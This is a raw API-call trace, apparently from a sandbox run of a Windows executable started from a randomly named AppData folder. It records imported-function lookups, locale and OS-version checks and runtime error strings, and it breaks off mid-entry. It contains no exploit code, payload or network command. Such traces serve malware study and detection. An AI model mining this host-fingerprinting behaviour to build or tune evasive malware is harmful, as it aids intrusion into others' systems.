GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.918] 
GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.919] GetProcAddress (hModule=0x76910000, 
lpProcName="GetCurrentThread") returned 0x76963351 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 
[0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.920] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.920] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.921] GetProcAddress (hModule=0x76910000, 
lpProcName="IsValidLocale") returned 0x76953de4 [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 
[0093.932] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.932] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.933] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 
[0093.933] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.933] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0093.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0093.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0093.934] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0093.934] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0093.934] GetProcAddress (hModule=0x76750000, 
lpProcName="CoTaskMemFree") returned 0x767a6f41 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0093.934] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0093.934] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.934] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0093.935] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0093.935] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 
[0093.935] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0093.935] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.935] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0093.935] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0093.935] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0093.935] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0093.936] SetThreadLocale (Locale=0x400) returned 1 [0093.936] GetVersion () returned 0x1db10106 [0093.936] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.936] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0093.936] GetModuleHandleW 
(lpModuleName="kernel32.dll") returned 0x76910000 [0093.936] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0093.936] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.936] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0093.936] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.937] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.937] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0093.937] GetACP () returned 0x4e4 [0093.937] GetCurrentThreadId () returned 0xaf0 [0093.937] GetVersion () returned 0x1db10106 [0093.937] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x1b1c18, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.937] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" 
(normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.937] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1230000 [0093.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.938] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.938] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.938] GetUserDefaultUILanguage () returned 0x409 [0093.938] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0093.938] GetThreadUILanguage () returned 0x120409 [0093.939] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) 
returned 1 [0093.939] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x135a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x135a680, pcchLanguagesBuffer=0x12d768) returned 1 [0093.939] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.939] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.939] GetUserDefaultUILanguage () returned 0x409 [0093.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0093.939] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.940] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0093.940] 
LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 
[0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0093.941] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.941] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.941] LocalAlloc 
(uFlags=0x40, uBytes=0x8) returned 0x1c4300 [0093.941] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0093.941] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: 